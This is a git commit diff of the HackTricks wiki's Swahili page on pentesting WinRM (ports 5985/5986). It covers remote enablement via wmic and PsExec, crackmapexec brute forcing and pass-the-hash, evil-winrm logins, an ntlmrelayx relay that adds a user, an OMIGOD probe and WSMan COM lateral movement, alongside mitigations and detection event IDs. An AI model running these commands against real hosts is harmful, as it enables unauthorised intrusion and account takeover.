maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['src/network-services-pentesting/5985-5986-pentesting-winrm.

Browse Source
This commit is contained in:
Translator 2025-08-13 16:15:31 +00:00
parent 0653205c13
commit ce92409026
1 changed files with 80 additions and 14 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

94
src/network-services-pentesting/5985-5986-pentesting-winrm.md
View File

@ -4,25 +4,25 @@
## WinRM
[Windows Remote Management (WinRM)](<https://msdn.microsoft.com/en-us/library/windows/desktop/aa384426(v=vs.85).aspx>) inasisitizwa kama **protokali na Microsoft** inayowezesha **usimamizi wa mbali wa mifumo ya Windows** kupitia HTTP(S), ikitumia SOAP katika mchakato. Kimsingi inategemea WMI, ikijitokeza kama kiolesura cha HTTP kwa shughuli za WMI.
[Windows Remote Management (WinRM)](<https://msdn.microsoft.com/en-us/library/windows/desktop/aa384426(v=vs.85).aspx>) inasisitizwa kama **protokali na Microsoft** inayowezesha **usimamizi wa mbali wa mifumo ya Windows** kupitia HTTP(S), ikitumia SOAP katika mchakato. Kimsingi inategemea WMI, ikijitambulisha kama kiolesura cha HTTP kwa shughuli za WMI.
Uwepo wa WinRM kwenye mashine unaruhusu usimamizi wa mbali kwa urahisi kupitia PowerShell, kama ilivyo kwa SSH kwa mifumo mingine ya uendeshaji. Ili kubaini ikiwa WinRM inafanya kazi, inashauriwa kuangalia ufunguzi wa bandari maalum:
- **5985/tcp (HTTP)**
- **5986/tcp (HTTPS)**
Bandari iliyo wazi kutoka orodha hapo juu inaashiria kuwa WinRM imewekwa, hivyo kuruhusu majaribio ya kuanzisha kikao cha mbali.
Bandari iliyo wazi kutoka kwenye orodha hapo juu inaashiria kuwa WinRM imewekwa, hivyo kuruhusu majaribio ya kuanzisha kikao cha mbali.
### **Kuanza Kikao cha WinRM**
Ili kuunda PowerShell kwa WinRM, cmdlet ya Microsoft `Enable-PSRemoting` inakuja katika hatua, ikiseti kompyuta kukubali amri za PowerShell za mbali. Kwa ufikiaji wa juu wa PowerShell, amri zifuatazo zinaweza kutekelezwa ili kuwezesha kazi hii na kutaja mwenyeji yeyote kama wa kuaminika:
Ili kuunda PowerShell kwa WinRM, cmdlet ya Microsoft `Enable-PSRemoting` inakuja katika hatua, ikiseti kompyuta kukubali amri za mbali za PowerShell. Kwa ufikiaji wa juu wa PowerShell, amri zifuatazo zinaweza kutekelezwa ili kuwezesha kazi hii na kutaja mwenyeji yeyote kama wa kuaminika:
```bash
Enable-PSRemoting -Force
Set-Item wsman:\localhost\client\trustedhosts *
```
Njia hii inahusisha kuongeza wildcard kwenye usanidi wa `trustedhosts`, hatua ambayo inahitaji kuzingatiwa kwa makini kutokana na athari zake. Pia inabainishwa kwamba kubadilisha aina ya mtandao kutoka "Public" hadi "Work" inaweza kuwa muhimu kwenye mashine ya mshambuliaji.
Njia hii inahusisha kuongeza wildcard kwenye usanidi wa `trustedhosts`, hatua ambayo inahitaji kuzingatia kwa makini kutokana na athari zake. Pia inabainishwa kwamba kubadilisha aina ya mtandao kutoka "Public" hadi "Work" inaweza kuwa muhimu kwenye mashine ya mshambuliaji.
Zaidi ya hayo, WinRM inaweza ku **anzishwa kwa mbali** kwa kutumia amri ya `wmic`, kama inavyoonyeshwa hapa:
Zaidi ya hayo, WinRM inaweza **kuzinduliwa kwa mbali** kwa kutumia amri ya `wmic`, kama inavyoonyeshwa hapa:
```bash
wmic /node:<REMOTE_HOST> process call create "powershell enable-psremoting -force"
```
@ -36,11 +36,11 @@ Ili kuthibitisha usanidi wa mashine yako ya shambulio, amri ya `Test-WSMan` inat
```bash
Test-WSMan <target-ip>
```
Majibu yanapaswa kuwa na habari kuhusu toleo la itifaki na wsmid, ikionyesha kwamba WinRM imewekwa vizuri.
Majibu yanapaswa kuwa na taarifa kuhusu toleo la itifaki na wsmid, ikionyesha kwamba WinRM imewekwa vizuri.
![](<../images/image (582).png>)
- Kinyume chake, kwa lengo **sio** lililowekwa kwa WinRM, hiyo itasababisha kutokuwepo kwa habari kama hizo za kina, ikionyesha ukosefu wa usanidi mzuri wa WinRM.
- Kinyume chake, kwa lengo **sio** lililowekwa kwa WinRM, matokeo yatakuwa hakuna taarifa kama hizo za kina, ikionyesha ukosefu wa usanidi mzuri wa WinRM.
![](<../images/image (458).png>)
@ -52,7 +52,7 @@ Invoke-Command -computername computer-name.domain.tld -ScriptBlock {ipconfig /al
```
![](<../images/image (151).png>)
Unaweza pia **kutekeleza amri ya console yako ya PS ya sasa kupitia** _**Invoke-Command**_. Fikiria kwamba una kazi inayoitwa _**enumeration**_ kwenye kompyuta yako na unataka **kuitekeleza kwenye kompyuta ya mbali**, unaweza kufanya:
Unaweza pia **kutekeleza amri ya console yako ya PS ya sasa kupitia** _**Invoke-Command**_. Fikiria kwamba una kazi inayoitwa _**enumeration**_ kwenye kompyuta yako ya ndani na unataka **kuitekeleza kwenye kompyuta ya mbali**, unaweza kufanya:
```bash
Invoke-Command -ComputerName <computername> -ScriptBLock ${function:enumeration} [-ArgumentList "arguments"]
```
@ -89,7 +89,7 @@ Exit-PSSession # This will leave it in background if it's inside an env var (New
### **Kulazimisha WinRM Kufunguliwa**
Ili kutumia PS Remoting na WinRM lakini kompyuta haijawekwa, unaweza kuikamilisha kwa:
Ili kutumia PS Remoting na WinRM lakini kompyuta haijawekwa, unaweza kuifanya iweze kwa:
```bash
.\PsExec.exe \\computername -u domain\username -p password -h -d powershell.exe "enable-psremoting -force"
```
@ -107,7 +107,7 @@ $sess1 = New-PSSession -ComputerName <computername> [-SessionOption (New-PSSessi
#And restore it at any moment doing
Enter-PSSession -Session $sess1
```
Katika kikao hiki unaweza kupakia skripti za PS ukitumia _Invoke-Command_
Ndani ya kikao hiki unaweza kupakia skripti za PS ukitumia _Invoke-Command_
```bash
Invoke-Command -FilePath C:\Path\to\script.ps1 -Session $sess1
```
@ -126,7 +126,7 @@ winrm set winrm/config/client '@{TrustedHosts="Computer1,Computer2"}'
### Brute Force
Kuwa makini, brute-forcing winrm kunaweza kuzuia watumiaji.
Kuwa makini, brute-forcing winrm inaweza kuzuia watumiaji.
```ruby
#Brute force
crackmapexec winrm <IP> -d <Domain Name> -u usernames.txt -p passwords.txt
@ -142,7 +142,7 @@ crackmapexec winrm <IP> -d <Domain Name> -u <username> -H <HASH> -X '$PSVersionT
```ruby
gem install evil-winrm
```
Soma **nyaraka** zake kwenye github: [https://github.com/Hackplayers/evil-winrm](https://github.com/Hackplayers/evil-winrm)
Soma **dokumentasiyo** kwenye github yake: [https://github.com/Hackplayers/evil-winrm](https://github.com/Hackplayers/evil-winrm)
```ruby
evil-winrm -u Administrator -p 'EverybodyWantsToWorkAtP.O.O.' -i <IP>/<Domain>
```
@ -220,11 +220,77 @@ end
- `port:5985 Microsoft-HTTPAPI`
## References
---
## Recent Vulnerabilities & Offensive Techniques (2021-2025)
### NTLM relay directly to WinRM (WS-MAN)
Tangu Impacket 0.11 (Mei 2023) `ntlmrelayx.py` inaweza kupeleka akreditif za NTLM zilizokamatwa moja kwa moja kwa **WS-MAN**/WinRM listener. Wakati mwenyeji bado anasikiliza kwenye **HTTP isiyo na usalama (5985)** mshambuliaji anaweza kuunganisha *mitm6* (au *Responder*) ili kulazimisha uthibitisho na kupata utekelezaji wa msimbo wa kiwango cha SYSTEM:
```bash
sudo ntlmrelayx.py -t wsman://10.0.0.25 --no-smb-server -smb2support \
--command "net user pwned P@ssw0rd! /add"
```
Mitigations
* Zima wasikilizaji wa HTTP `Set-Item WSMan:\localhost\Service\EnableCompatibilityHttpListener -Value false`
* Lazimisha HTTPS na kuwezesha Ulinzi wa Kupanuliwa kwa Uthibitishaji (EPA) kwenye toleo jipya la Windows.
### OMIGOD CVE-2021-38647 (Azure OMI)
Azure Linux agents hutumia huduma ya **Open Management Infrastructure (OMI)** ambayo inafichua API ya WinRM/WS-MAN kwenye porti **5985/5986**. Kosa la mantiki liliruhusu **RCE isiyo na uthibitisho kama root**:
```text
curl http://victim:5985/wsman -H 'Content-Type:text/xml' -d '<xml />'
```
Patch auondoe OMI (toleo ≥ 1.6.8-1) na kuzuia bandari hizo kutoka kwa Mtandao.
### WSMan.Automation COM matumizi mabaya kwa ajili ya harakati za upande
WinRM inaweza kuendeshwa bila PowerShell kupitia `WSMan.Automation` COM object muhimu kwenye mifumo katika hali ya Lugha Iliyopangwa. Zana kama *SharpWSManWinRM* zinafunga mbinu hii:
```powershell
$ws = New-Object -ComObject 'WSMan.Automation'
$session = $ws.CreateSession('http://srv01:5985/wsman',0,$null)
$cmdId = $session.Command('cmd.exe',@('/c','whoami'))
$session.Signal($cmdId,0)
```
Mnyororo wa utekelezaji (`svchost → wmiprvse → cmd.exe`) ni sawa na PS-Remoting ya jadi.
---
## Sasisho za Zana
* **Evil-WinRM v3.x (2024)** sasa inasaidia **Kerberos** (`-k` / `--spn`) na uthibitishaji wa **cheti** (`--cert-pem`/`--key-pem`), usajili wa kikao (`-L`) na uwezo wa kuzima ukamilishaji wa njia ya mbali (`-N`).
```bash
RHOST=10.0.0.25 evil-winrm -i $RHOST -u j.doe -k --spn HTTP/$RHOST
```
* **Python `pypsrp` 0.9 (2024)** inatoa WinRM & PS-Remoting kutoka Linux, ikiwa ni pamoja na CredSSP na Kerberos:
```python
from psrp.client import Client
c = Client('srv01', username='ACME\\j.doe', ssl=True)
print(c.execute_cmd('ipconfig /all').std_out.decode())
```
* **Ugunduzi** fuatilia kumbukumbu ya **Microsoft-Windows-WinRM/Operational**:
* Tukio 91 / 163 shell imeundwa
* Tukio 182 kushindwa kwa uthibitishaji
* Katika kumbukumbu ya Usalama tukio 4262 linaandika IP ya chanzo (imeongezwa Julai 2022 CUs).
Kusanya hizi kwa kati na kutoa tahadhari kuhusu IP zisizo na jina au za nje.
---
## Shodan
- `port:5985 Microsoft-HTTPAPI`
## Marejeleo
- [https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-3-wmi-and-winrm/](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-3-wmi-and-winrm/)
- [https://bohops.com/2020/05/12/ws-management-com-another-approach-for-winrm-lateral-movement/](https://bohops.com/2020/05/12/ws-management-com-another-approach-for-winrm-lateral-movement/)
- [https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure](https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure)
- [https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-3-wmi-and-winrm/](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-3-wmi-and-winrm/)
## HackTricks Automatic Commands
## HackTricks Amri za Otomatiki
```
Protocol_Name: WinRM #Protocol Abbreviation if there is one.
Port_Number: 5985 #Comma separated if there is more than one.